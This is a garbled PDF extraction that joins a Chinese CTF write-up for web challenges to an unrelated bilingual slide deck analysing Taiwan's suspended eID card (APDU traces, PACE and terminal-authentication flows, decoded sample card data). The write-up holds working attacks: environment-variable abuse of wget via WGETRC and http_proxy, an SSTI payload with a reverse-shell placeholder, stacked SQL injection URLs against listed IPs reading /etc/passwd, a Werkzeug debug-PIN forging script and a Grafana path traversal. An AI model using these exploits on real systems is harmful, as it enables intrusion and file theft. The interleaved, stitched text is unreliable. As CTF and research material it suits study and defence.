道⼤概的结构
version: "3"
services:
lotto:
build:
context: lotto/
dockerfile: Dockerfile
container_name: "lotto"
之后看看代码,这⾥⾯有三个路由,从短到长
⾸先result路由返回 /app/lotto_result.txt ⽂件内容结果
forecast 路由可以上传⼀个⽂件保存到 /app/guess/forecast.txt
app:
build:
context: app/
dockerfile: Dockerfile
links:
- lotto
container_name: "app"
ports:
- "8880:8080"
@app.route("/result", methods=['GET'])
def result():
if os.path.exists("/app/lotto_result.txt"):
lotto_result = open("/app/lotto_result.txt", 'rb').read().decode()
else:
lotto_result = ''
return render_template('result.html', message=lotto_result)
@app.route("/forecast", methods=['GET', 'POST'])
def forecast():
message = ''
if request.method == 'GET':
return render_template('forecast.html')
elif request.method == 'POST':
if 'file' not in request.files:
message = 'Where is your forecast?'
还有最关键的lotto路由(代码太多就不放完了),可以
如果预测的值与环境随机⽣成的相等就能获得flag
file = request.files['file']
file.save('/app/guess/forecast.txt')
message = "OK, I get your forecast. Let's Lotto!"
return render_template('forecast.html', message=message)
os.system('wget --content-disposition -N lotto')
@app.route("/lotto", methods=['GET', 'POST'])
def lotto():
elif request.method == 'POST':
//看到flag从环境变量当中取出
flag = os.getenv('flag')
lotto_key = request.form.get('lotto_key') or ''
lotto_value = request.form.get('lotto_value') or ''
lotto_key = lotto_key.upper()
if safe_check(lotto_key):
os.environ[lotto_key] = lotto_value
try:
//从内⽹http://lotto当中获得随机值
os.system('wget --content-disposition -N lotto')
if os.path.exists("/app/lotto_result.txt"):
lotto_result = open("/app/lotto_result.txt",
'rb').read()
else:
lotto_result = 'result'
if os.path.exists("/app/guess/forecast.txt"):
其中内⽹的lotto页⾯可以看到就是随机⽣成20个40以内随机数并返回
同时对于我们能控制的环境变量也有过滤 safe_check ,那像p⽜之前提到的直接RCE就不⾏
了
forecast = open("/app/guess/forecast.txt",
'rb').read()
else:
forecast = 'forecast'
if forecast == lotto_result:
return flag
@app.route("/")
def index():
lotto = []
for i in range(1, 20):
n = str(secrets.randbelow(40))
lotto.append(n)
r = '\n'.join(lotto)
response = make_response(r)
response.headers['Content-Type'] = 'text/plain'
response.headers['Content-Disposition'] = 'attachment;
filename=lotto_result.txt'
return response
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=80)
def safe_check(s):
if 'LD' in s or 'HTTP' in s or 'BASH' in s or 'ENV' in s or 'PROXY' in
s or 'PS' in s:
return False
return True
既然题⽬要求如果预测成功就返回给我flag,那有啥办法能控制吗,这⾥就⽤到了 PATH
PATH变量 就是⽤于保存可以搜索的⽬录路径,如果待运⾏的程序不在当前⽬录,操作系统便
可以去依次搜索 PATH变量 变量中记录的⽬录,如果在这些⽬录中找到待运⾏的程序,操作系
统便可以直接运⾏,前提是有执⾏权限
那这样就⽐较简单了,如果我们控制环境变量 PATH ,让他找不到 wget ,这样 wget --
content-disposition -N lotto 就会报错导致程序终⽌, /app/lotto_result.txt 当
中的内容就⼀直是第⼀次访问,随机⽣成的那个值了
1. 访问/lotto获得第⼀次的结果
2. 访问result页⾯记录内容下来备⽤
3. 修改环境变量PATH后,发送预测值,再次访问/lotto即可
可以看到确实得到了flag,其中res.txt是第⼀次环境随机⽣成的结果
oh-my-lotto-revenge
做了⼀个修正,就算预测成功也没有结果返回,那就考虑如何rce了
先读⽂档https://www.gnu.org/software/wget/manual/wget.html#:~:text=6.1-,Wgetrc%20Location,-
When%20initializing%2C%20Wget
if forecast == lotto_result:
return "You are right!But where is flag?"
else:
message = 'Sorry forecast failed, maybe lucky next time!'
return render_template('lotto.html', message=message)
发现有⼀个 WGETRC ,如果我们能够控制环境变量就可以操纵wget的参数了,这⾥有很多有意
思的变量
这⾥说两个我解决这个问题⽤到的,⼀个是http_proxy,很明显如果配置了这个,本来是直接
wget访问 http://lotto 的就会先到我们这⾥做⼀个转发,我们就可以当⼀个中间⼈
做个实验,此时再wget以后,成功接收到这个请求
因此我们只需要控制返回内容即可,那既然可以控制内容了,那能否控制⽬录呢,正好有
output_document,相当于 -O 参数
那么我覆盖index.html打SSTI即可
因此得到payload,写⼊内容为
http_proxy = string
Use string as HTTP proxy, instead of the one specified in environment.
output_document = file
Set the output filename—the same as ‘-O file’.
控制返回内容为
http_proxy=http://xxxxx
output_document = templates/index.html
{{config.__class__.__init__.__globals__['os'].popen('反弹shell').read()}}
import requests
def web():
url = "http://xxx/"
r = requests.post(url + "forecast",
files={'file':
open("/Users/y4tacker/PycharmProjects/pythonProject/lottt/y4.txt", "rb")})
data = {
"lotto_key": "WGETRC",
"lotto_value": "/app/guess/forecast.txt"
}
r = requests.post(url + "lotto", data=data)
print(r.text)
if __name__ == '__main__':
web()
oh-my-notepro
好吧又是⿊盒,烦死了
登录后,只有⼀个创建note的功能点,先是测试了下各种SSTI的payload没啥反应,之后猜测
是不是要获取到admin的noteid,⾸先看到这种又臭又
长 0pn2jtgnfer9zaijadymsmq347eqmay3 的字符肯定是不能爆破,尝试sql注⼊,经典单引
号报错
尝试回显有五列,但是payload这么简单,毕竟是XCTF肯定不可能sql注⼊就能从数据库拖出
flag(⼤概率⽆过滤是不可能这么简单的),当然也确实验证了没有flag,甚⾄没有admin⽤户
接下来尝试load_file读⽂件也不⾏,后⾯想去看看⼀些配置信息,⼀般我们通过类似 show
variables like xxx 这样去读,但是其实也可以直接通过sql语句拿到global当中的信息
好吧真拿你没办法洛
后⾯发现local_infile开了,不知道这是啥可以看看CSS-T | Mysql Client 任意⽂件读取攻击链拓
展
select @@global.secure_file_priv
那么要利⽤肯定常规的注⼊不⾏,只有⼀个东西能满⾜,那就是堆叠注⼊,简单验证下
页⾯确实有延时那验证了我们的猜想,接下来读⽂件
果然可以bro
那么想要rce只剩⼀个⽅法咯,都有报错页⾯了,算算pin呗
需要:
1.flask所登录的⽤户名
http://123.60.72.85:5002/view?note_id=0' union select 1,2,3,4,5;select
sleep(2)--+
http://123.60.72.85:5002/view?note_id=0' union select 1,2,3,4,5; create
table y4(t text); load data local infile '/etc/passwd' INTO TABLE y4 LINES
TERMINATED BY '\n'--+
2.modname-⼀般固定为flask.app
3.getattr(app, “name”, app.class.name) - 固定,⼀般为Flask
4.在flask库下app.py的绝对路径,通过报错泄漏
5.当前⽹络的mac地址的⼗进制数
6.docker机器id
⽹上直接抄了⼀个发现不对,简单看了flask⽣成pin码的地⽅,在 python3.8/site-
packages/werkzeug/debug/__init__.py#get_pin_and_cookie_name
发现python3.8以后从原来的md5改成了sha1
那简单写个利⽤脚本就好了呗
import requests
import re
import hashlib
from itertools import chain
url = "http://124.70.185.87:5002/view?note_id="
payload1 = "0' union select 1,2,3,4,5; create table y4(t text); load data
local infile '/sys/class/net/eth0/address' INTO TABLE y4 LINES TERMINATED
BY '\\n'--+"
payload2 = "0' union select 1,2,3,4,5; create table yy4(t text); load data
local infile '/proc/self/cgroup' INTO TABLE yy4 LINES TERMINATED BY '\\n'-
-+"
payload3 = "0' union select 1,2,3,(select group_concat(t) from y4),1; --+"
payload4 = "0' union select 1,2,3,(select group_concat(t) from yy4),1; --
+"
headers = {
"cookie":"session=.eJwVi0EKwyAQAL8ie8mlEE3ArP1MWXdXCE21REsJpX-
POcxlhvkB1z09WnlqhjvMkwvKHBktRmfD5J1NKj5EXBDZeppVAi5wg0_VPdNL-
7UVEiPUyKw5rZuaYdTG45tq_crQZSumUezhOKRewP8E760nRw.YlqN-
g.KZrp8S7tsXPS60cPH88awzRI35Q"
}
r = requests.get(url+payload1,headers=headers)
r = requests.get(url+payload2,headers=headers)
probably_public_bits = [
'ctf'# /etc/passwd
'flask.app',# 默认值
'Flask',# 默认值
'/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]
private_bits = [
str(int(re.search('</h1><pstyle="text-align:center">(.*?)</p>
</ul>',requests.get(url+payload3,headers=headers).text.replace("\n",
"").replace(" ","")).groups()[0].replace(':',''),16)),#
/sys/class/net/eth0/address 16进制转10进制
'1cc402dd0e11d5ae18db04a6de87223d'+re.search('</h1><pstyle="text-
align:center">(.*?)</p></ul></body></body>
</html>',requests.get(url+payload4,headers=headers).text.replace("\n",
"").replace(" ","")).groups()[0].split(",")[0].split("/")[-1]#
/etc/machine-id + /proc/self/cgroup
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
oh-my-grafana
之前被爆有任意⽂件读,不知道有啥插件简单fuzz⼀下得到
⼤概看了下⽂档看看能读些什么配置
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
/public/plugins/alertGroups/../../../../../../../../etc/passwd
先是读了sqlite,dump下来想看看admin密码来着,尝试很多没破解成功,显然是我不懂密码
学
不过后⾯看到了 grafana.ini ,⾥⾯泄漏了,好吧还成功登陆了
后台啥都⽆,不过有个添加数据源的地⽅,显然这⾥被注释了,但是真的链接成功了
后⾯就是任意执⾏sql语句拿下了,没啥难度 | pdf |
Analysis Experience of the suspended
EID Card
對「被暫停」的晶片身分證之分析經驗分享
Speaker : Shi-Cho Cha
主講人:查士朝
Dept. of Information Management, NTUST, Chairman and Professor
國立臺灣科技大學資訊管理系 教授兼系主任
Taiwan Information Security Center, Director
國立臺灣科技大學資通安全研究與教學中心主任
Background
背景
2
https://www.ris.gov.tw/apply-
idCard/app/idcard/IDCardReissue/main
https://www.ris.gov.tw/app/portal/789
Current Status: Suspended
現況: 暫停中
https://www.ithome.com.tw/news/142375
Outline
大綱
4
Information
Collection
資訊收集
Learning How
it Works?
確認運作方式
Identifying
Potential
Vulnerabilities
識別可能弱點
Key Findings
主要發現
Recommendation
建議
Information Collection
資訊收集
5
Information
Collection
資訊收集
Learning How
it Works?
確認運作方式
Identifying
Potential
Vulnerabilities
識別可能弱點
Key Findings
主要發現
Recommendation
建議
6
https://www.ris.gov.tw/app/portal/789
7
8
Hardware
Architecture
硬體架構
Crypto.
Library
密碼學
函式庫
Card OS
作業系統
Applet
應用程式
EAC+SAC
EAL6+
EAL6+
EAL6+
EAL5+
Card OS
卡片作業系統
Library
函式庫
Applet
應用程式
Common Criteria
共通準則認證
ISO/IEC 7816
ISO/IEC 14443
ISO 7816-4
ICAO 9303
Household Registration Address Zone
戶籍地址區
Public Data Zone
公開區
Encrypted Data Zone
加密區
Citizen Digital Certificate Zone
自然人憑證區
9
Household Registration Address Zone
戶籍地區
Household Registration Address (Village and
Neighborhood)
戶籍地址 (到村里鄰)
Public Data Zone
公開區
Name 姓名
National ID No. 統一編號
Birthday 出生日期
Household Registration Address 戶籍地址
Compulsory Military Service Status役別
Marriage Status 結婚狀態
Card ID No. 證件號碼
Date of Replacement 應換領日期
Date of Issue 製證日期
Photo 相片 (300dpi)
No Access Control
無存取控制
Contact
接觸式
Contactless
非接觸式
○
○
ICAO SAC
(Supplemental
Access Control)
with MRZ or CAN
Contact
接觸式
Contactless
非接觸式
○
○
10
Encrypted Data Zone
加密區
Spouse Name 配偶姓名
Father 父姓名
Mother 母姓名
Place of Birth 出生地
Gender 性別
Citizen Digital Certificate Zone
自然人憑證區
姓名
統一編號後 4 碼
憑證序號
憑證有效日期
ICAO EAC
(Extended Access
Control) + TA
+PIN1
Contact
接觸式
Contactless
非接觸式
○
PIN2
Contact
接觸式
Contactless
非接觸式
○
ICAO Doc 9303
• Machine Readable Travel Documents Eighth Edition, 2021
• Part 1: Introduction
• Part 2: Specifications for the Security of the Design, Manufacture and Issuance of MRTDs
• Part 3: Specifications Common to all MRTDs
• Part 4: Specifications for Machine Readable Passports (MRPs) and other TD3 Size MRTDs
• Part 5: Specifications for TD1 Size Machine Readable Official Travel Documents (MROTDs)
• Part 6: Specifications for TD2 Size Machine Readable Official Travel Documents (MROTDs)
• Part 7: Machine Readable Visas
• Part 8: Emergency Travel Documents
• Part 9: Deployment of Biometric Identification and Electronic Storage of Data in eMRTDs
• Part 10: Logical Data Structure (LDS) for Storage of Biometrics and Other Data in the
Contactless Integrated Circuit (IC)
• Part 11: Security Mechanisms for MRTDs
• Part 12: Public Key Infrastructure for MRTDs
• Part 13: Visible Digital Seals
https://www.icao.int/Meetings/TAG-MRTD/Documents/Tag-
Mrtd-20/TagMrtd-20_Pres_TD-1_Broekhaar-wp20.pdf
TD1
TD2
TD3
13
By Bundesrepublik Deutschland, Bundesministerium des Innern. - PRADO, Public
Domain, https://commons.wikimedia.org/w/index.php?curid=80366059
https://www.icao.int/Security/FAL/TRIP/PublishingImages/Pages/Public
ations/Guidelines%20-%20VDS%20for%20Travel-
Related%20Public%20Health%20Proofs.pdf
Visa
Visa with Digital Seal
Learning How it Works?
確認運作方式
14
Information
Collection
資訊收集
Learning How
it Works?
確認運作方式
Identifying
Potential
Vulnerabilities
識別可能弱點
Key Findings
主要發現
Recommendation
建議
15
Additional HiCOS Aplication
is Required
這邊需要另外裝一個
HiCOS 套件
16
You can read the
Household Registration
Address Zone Directly
可以直接讀戶籍地址區
18
You need MRZ or CAN to
Read the Public Data Zone
需要使用 MRZ 或 CAN 以
讀取公開區
19
It is Very Complicated to Read
the Encrypted Data Zone
要讀取加密區就複雜了 ……
Capture the USB Packets with Wireshark and USBPCap
可以使用 Wireshark 與 USBPCap 去抓取 USB 封包
Test Standard is Good Resource
測試標準是可以讓我們了解正常運作方式的最佳資源
I Usually Start with Select (00:A4) Command
我通常會從選取 (00:A4) 指令開始
Select MF Root
LDS1 eMRTD Application
MF
(Master File)
ICAO 9303-10
LDS1 eMRTD Application
AID = ‘A0 00 00 02 47 10 01’
EF.CardAccess
(Short File
Identifier ‘1C’)
EF.DIR
(Short File
Identifier ‘1E’)
EF.ATR/INFO
(Short File
Identifier ‘01’)
EF.CardSecurity
(Short File
Identifier ‘1D’)
EF.COM
(Short File
Identifier ‘1E’)
EF.DG1
(Short File
Identifier ‘01’)
EF.DG3
(Short File
Identifier ‘03’)
EF.DG2
(Short File
Identifier ‘02’)
EF.SOD
(Short File
Identifier ‘1D’)
EF.DG16
(Short File
Identifier ‘10’)
……
Data Group
EF Name
Short EF Identifier
EF Identifier
Tag
Common
EF.COM
1E
01 1E
60
DG1
EF.DG1
01
01 01
61
DG2
EF.DG2
02
01 02
75
DG3
EF.DG3
03
01 03
63
DG4
EF.DG4
04
01 04
76
DG5
EF.DG5
05
01 05
65
DG6
EF.DG6
06
01 06
66
DG7
EF.DG7
07
01 07
67
DG8
EF.DG8
08
01 08
68
DG9
EF.DG9
09
01 09
69
DG10
EF.DG10
0A
01 0A
6A
DG11
EF.DG11
0B
01 0B
6B
DG12
EF.DG12
0C
01 0C
6C
DG13
EF.DG13
0D
01 0D
6D
DG14
EF.DG14
0E
01 0E
6E
DG15
EF.DG15
0F
01 0F
6F
DG16
EF.DG16
10
01 10
70
Document Security Object
EF.SOD
1D
01 1D
77
Common
EF.CARDACCESS
1C
01 1C
Common
EF.ATR/INFO
01
2F 01
Common
EF.CardSecurity
1D
01 1D
讀取 EF.CardAccess
• [30 0d [06 08 04 00 7f 00 07 02 02 02] [02 01 02]]
• [30 0f [06 0a 04 00 7f 00 07 02 02 03 02 02] [02 01 02]]
• [30 12 [06 0a 04 00 7f 00 07 02 02 04 02 04] [02 01 02]
[02 01 12]]
• [30 17 [06 06 67 81 08 01 01 05] [02 01 01] [06 0a 04 00
7f 00 07 01 01 04 01 03]]
• [30 19 [06 09 04 00 7f 00 07 02 02 03 02] [30 0c [06 07 04
00 7f 00 07 01 02] [02 01 12]]
• 90 00
Type
Tag encoding
Boolean
0x01
Integer
0x02
Bitstring
0x03
Octetstring
0x04
Null
0x05
Object identifier
0x06
Sequence
0x30
Sequence of
0x30
Set
0x31
Set of
0x31
UTCTime
0x17
id-PACE-ECDH-GM-AES-CBC-CMAC-256
v2
p521
id-TA
v2
id-CA-ECDH-AES-CBC-CMAC-128
Active Authentication protocol
id-CA-ECDH
bsiEcKeyType
ecdsa-plain-SHA256
OID Repository
27
28
Learning from JMRTD
從 JMRTD 中學習
30
Authentication Process
鑑別程序
31
Read EF.CardAccess (Required)
讀取 EF.CardAccess (必要)
Read EF.DIR (Optional)
讀取 EF.DIR (非必要)
Authenticate with PACE
使用 PACE 進行鑑別
Authenticate with BAC
使用 BAC 進行鑑別
Starting 1 January 2018, eMRTD chips implementing PACE only
2018/1/1 後的 eMRTD 晶片只實作 PACE
32
Process of BAC
BAC 的運作程序
IFD
IC
1. Get Challenge
2. RND.IC
RND.IFD and K.IFD
S = RND.IFD || RND.IC || K.IFD
EIFD = E(KEnc, S)
MIFD = MAC(KMAC, EIFD)
3. External Authenticate
K.IC
R = RND.IC || RND.IFD || K.IC
EIC = E(KEnc, R).
MIC = MAC(KMAC, EIC).
EIC || MIC.
KSEnc and KSMAC
KS.SEED = K.IFD XOR K.IC
EIFD || MIFD
EIC || MIC
4. Communicate with Session Key
The biggest issue of BAC is
using 3DES?
BAC 最大的問題應該是用
3DES 加密?
Process of PACE GM
PACE GM 的運作程序
34
IFD
IC
PACEInfo has been obtained
之前已取得 PACE 參數
MSE:AT Set Parameter
設定參數
Get a Encrypted Nonce
取得加密亂數
Nonce Generation
產生亂數
Generate temporary keys
for mapping
產生暫時映射用金鑰
Exchange Generated Public Keys
交換產生的公開金鑰
Generate keys for key
agreement with nonce
產生產生協議金鑰用金鑰
Generate keys for key
agreement with nonce
產生產生協議金鑰用金鑰
Exchange Generated Public Keys
交換產生的公開金鑰
Generate temporary keys
for mapping
產生暫時映射用金鑰
Generate Agreement Key
and Token
產生協議金鑰與 Token
Generate Agreement Key
and Token
產生協議金鑰與 Token
Token Exchange
交換 Token
35
Password
Encoding
MRZ
SHA-1(DOC Number || DoB || DoE)
CAN
ISO 8859-1 Encoded String
KDF∏(f(∏),3)
z = E (K∏,RND.IC)
IC
IPS
z
RND.IC = D (K∏, z)
D = Map(DIC, RND.IC, ….)
D = Map(DIC, RND.IC, ….)
Choose (SKDH,IPS, PKDH,IPS)
Based on D
Choose (SKDH,IC, PKDH,IC)
Based on D
PKDH,IC
PKDH,IPS
K=KA(PKDH,IC, SKDH,IPS)
K=KA(SKDH,IC, PKDH,IPS)
Generate KSEnc, KSMAC
Generate KSEnc, KSMAC
TIC = MAC(KSMAC, PKDH,IPS)
[AIC = E(KSENC, CAIC)]
TIPS = MAC(KSMAC, PKDH,IC)
TIC [,AIC]
TIPS
[PKDH,IC ?= KA(CAIC, PKIC, D)]
36
DG11
• 6B70[5F040BE69FB3F0A98D9CF0A795A6][5F0500][5F060B[4C49552C44554F2D54554F]][5F070
A53323330383932373338][5F08083139363731313231][5F090130][5F0A09415430303030303035]
[5F0B083230333031303135][5F0C083230323031303135][5F0D103130303039303139353231303
0323339]000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000009000
37
LIU,DUO-TUO
S230892738
19671121
AT0000005
20301015
20201015
1000901952100239
DG12
• 6C3D[5F0E0120][5F0F36E696B0E58C97E5B882E7919EE88AB3E58D80E9BE8DE5B1B1E9878C
303130E984B0E980A2E794B2E8B7AFEFBC92EFBC98EFBC90E8999F]00000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000009000
38
新北市瑞芳區龍山里010鄰逢甲路280號
IFD
Select Card Application
選取卡片應用程式
Set Parameter
設定參數
PACE
Active Authentication
主動鑑別
Data Access
讀取資料
IFD
Select Card Application
選取卡片應用程式
Set Parameter
設定參數
PACE
Chip Authentication
晶片鑑別
Terminal Authentication
進行 TA 鑑別讀卡裝置
Data Access
選取與讀取資料
From Accessing Public Data Zone to Encrypted Data Zone
從公開區到加密區
Chip Authentication Process
CA 認證程序
40
IC
IPS
DIC, SKIC, PKIC
TIC, rIC
DIC, PKIC
෫
SKIPS
CA , ෫
𝑃KIPS
CA
K=KA( ෫
SKIPS
CA , PKIC, DIC)
෫
𝑃KIPS
CA
K=KA(SKIC, ෫
𝑃KIPS
CA , DIC)
rIC
TIC=MAC(KMAC, ෫
𝑃KIPS
CA )
Terminal Authentication Process
TA 認證程序
41
IC
IPS
Choose rIC randomly
隨機選擇 rIC
rIC
sIPS = Sign(SKIPS,IDIC∣∣rIC∣∣
Comp(PKIPS))
sIPS
Signature Verification
驗證簽章
42
MSE AT: Set Parameter
(MANAGE SECURITY ENVIRONMENT command with Set
Authentication Template function)
00 22 c1 a4 27
80 0a 04 00 7f 00 07 02 02 04 02 04
83 01 03
7f 4c 12 06 09 04 00 7f 00 07 03 01 02
02 53 05 00 00 00 60 00
84 01 12
PACE
Read Certificate from EF.CardSecurity
Send DV and AT Cert to Card
Set MSE:SET AT External Authentication
OID || Holder for AT ||
Temporary Public Key
Get Challenge
External Authentication
Sign (Temporary IC Public Key in
PACE process || challenge ||
Temporary Public Key)
43
Certified Host
認可單位
EID Center
EID 中心
DV 憑證與 AT 憑證
[0] Version: 3
SerialNumber: 28156782072750167572079822468317946189
IssuerDN: C=TW,O=行政院,OU=內政部,OU=戶政司,CN=CSCA
Start Date: Fri Sep 25 11:37:12 CST 2020
Final Date: Tue Mar 25 23:59:59 CST 2031
SubjectDN: C=TW,O=行政院,OU=內政部,OU=戶政司,CN=DS202009250001
Public Key: EC Public Key [c6:7c:fb:e1:c8:4f:e3:4a:4d:23:2a:ab:2e:06:57:77:5e:27:d6:b4]
X: 7db0dd8864840f9856c957715162c28c346c936cc92fdff9c1ffb110c09dac3e7ae067ba4a0b8e93bd86451b860377b85d67da133ee5d10bafaa7068dc88c76056
Y: 96139cc7cfe114c851e96b0d03b851fd16d19b5d61e3cbccf7a135f69e047f7765771600bc6afc633bb17aa8953a7a4ea8cfe22a3b179b8b1b66f8b1340b7d97dd
Signature Algorithm: SHA256withECDSA
Signature: 308188024201cce9925eccee1a00ba46625a6c13c0a70c3dc9bb368253c6917c3f399bc4c20087e0f3f1595ae193ee474cafebc386f8a40aa5040103
2060314d2b400ed66b20ad0242008800e154df65aeb9bae33d7bb45f1fd6800a8e335c2a21eba5ae033c56f06e29384ac5308654ca0fbd98b19e5e29
cdace675d157c66e09a49fa69b5be91d2b3f25
Extensions:
critical(false) 2.5.29.16 value = Sequence
Tagged [0] IMPLICIT
DER Octet String[15]
Tagged [1] IMPLICIT
DER Octet String[15]
critical(false) 2.5.29.35 value = Sequence
Tagged [0] IMPLICIT
DER Octet String[20]
critical(false) 2.5.29.14 value = DER Octet String[20]
critical(true) KeyUsage: 0x80
44
7f21 CV_CERTIFICATE
7f4e CERTIFICATE_BODY
5f29 PROFILE_IDENTIFIER 0
42 CA_REFERENCE TW/MOICVCAG1/00001
7f49 PUBLIC_KEY
6 OID 0.4.0.127.0.7.2.2.2.2.3
86 PUBLIC_POINT_Y
040048B5D4E6C2B2E91B3D3DCF5C91E4A0C45BFE98086EBEF6440FFB20326BD5BC978CAACE4BCDA82731DDAE3EF880
BFB4F7A6A5BE30798CF36A2833D9B186A4F916E10022B0E68FEB6CD42FD2ADB52FC30E181BD8A73432E1BB3F7928653B
D4CF3D7727904C36C3B2890527472BCF476323D89192AE82973B0081D7B02C939950C08CF37C
5f20 HOLDER_REFERENCE TW/MOIDVCAG1/00001
7f4c HOLDER_AUTH_TEMPLATE
6 OID 0.4.0.127.0.7.3.1.2.2
53 ROLE_AND_ACCESS_RIGHTS BFFFFFFFFF: DV-domestic/Age Verification, Community ID Verification, Restricted
Identification, Privileged Terminal, CAN Allowed, PIN Management, Install Certificate, Install Qualified Certificate, R-DG1, R-DG2,
R-DG3, R-DG4, R-DG5, R-DG6, R-DG7, R-DG8, R-DG9, R-DG10, R-DG11, R-DG12, R-DG13, R-DG14, R-DG15, R-DG16, R-
DG17, R-DG18, R-DG19, R-DG20, R-DG21, RFU-29, RFU-30, RFU-31, RFU-32, W-DG21, W-DG20, W-DG19, W-DG18, W-DG17
5f25 EFFECTIVE_DATE 2020-09-17
5f24 EXPIRATION_DATE 2026-03-17
5f37 SIGNATURE
A2AD152186C5E700DA2CCAB883B85CAF2AC2892643011452D421E8CE45C311D96A1DA3BFB1992054751B2FDE7AC9DE6F
869400740920519D676C37DF8028A520DBBE96602C317AD338439DBDCBC122338D4990BA6EE30B07E40BDC0F3E2D3F31F
E8D8DAA9C8BF7AC6BA8241F24C4ED94FB2D332016A54FF35F02623AC857C77DAFF6
45
7f21 CV_CERTIFICATE
7f4e CERTIFICATE_BODY
5f29 PROFILE_IDENTIFIER 0
42 CA_REFERENCE TW/MOIDVCAG1/00001
7f49 PUBLIC_KEY
6 OID 0.4.0.127.0.7.2.2.2.2.3
86 PUBLIC_POINT_Y
0401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA67700004D41A089
02C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578BFE80451DA6F13B9C2D2
92B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03A9E6B633997C8A2EE3EB
5f20 HOLDER_REFERENCE TW/MOICA0085/00000
7f4c HOLDER_AUTH_TEMPLATE
6 OID 0.4.0.127.0.7.3.1.2.2
53 ROLE_AND_ACCESS_RIGHTS 0000006000: Authentication-Terminal/R-DG6, R-DG7
5f25 EFFECTIVE_DATE 2020-11-20
5f24 EXPIRATION_DATE 2020-11-26
5f37 SIGNATURE
0151F4D4706828898DC1EA8AE4D9292105D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E
4BF4E719097CCD48057F4EB79C22F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269
A6D759F65C2E27EAFF1429C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
46
ECC Output ….
ECC 輸出 …..
• 0300A55A05060014A092B6642E095A78929DA3116678EFCB10533BA8A21B7D008A09E287E00B9
8924BDD55E55C2BF1A50BE5849706A85E27EDB61B857AA65ED3A4A4D0
• 00A55A05060014A092B6642E095A78929DA3116678EFCB10533BA8A21B7D008A09E287E00B989
24BDD55E55C2BF1A50BE5849706A85E27EDB61B857AA65ED3A4A4D0
47
MSE set AT Ext Auth: 9000
Get Challenge: 386496050041522C9000
386496050041522C
select file DG6: 990290008E08C006DC1E2DB1D3BD9000
decrypted verified:9000
readbinary:878201A101FBE49AE2CA4342F6B0397AE2AAAE9854BF0687740B6D79C12480E2B0DAEA0D051E5733E7EAA544
6EDBD8287EA19D962622E426C12C4DC427BAC21B71DAD16D29ECDD984BF460E6779DB5C29B495C481D036BF6C2CED8
F1B9B25165F04C0DB72F4569D11E757A845D42E5DA88D34BC70F0930696AC657496D88D43261A4C7C502B37B51A0808665
E9B9CB41C05BB579F44168110350A14070EF1879DCBD755678EFB2AB669910CCC1AEEB0A4B0C873B49565CC3762C07D5
7D2CA9289C1F4D8E53206A9899AD5C8BB624FFDAA6B08371606E88CDE55DDFA3293FC3AD2036D56D85105379D288CD78
D7D31C4AA206F2F344A62E9539E2BEFF8B6F3A86FFD3EC86D5281F1DA3D1F4BFA3C3E4C429D762635CB8041840FEFFDE
A3C65AC34C7A209D81A5EFD8C97CC89D9E848593FCB1306D14532F3B41E2141292B00D3535DAF08FF8FE588BC29E2C22
6B1981AB53AA297D7D3F2F09B2A3B8D9C803C4F7F353E89E31F3C10482AB6A661F3680C14C01DF97B58EF9BC275D8DFB
708C518EDF2C8620710ABDE7A1A6A69A33F28EEB71EC533ECD7F52EC7FE8FEABA1261407AB2839D1BD990290008E080A
B6AC20C88203199000
decrypted
DG6:66205F1301315F140BE69FB3F0A28A96F0AAA9A85F15005F16083035303339323930000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009000
48
柳𢊖𪩨
1
05039290 (Random Value)
DG7:67205F1701315F180BE5A79CF0AFA58EF3BCBB945F19005F1A08393033393030363800000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
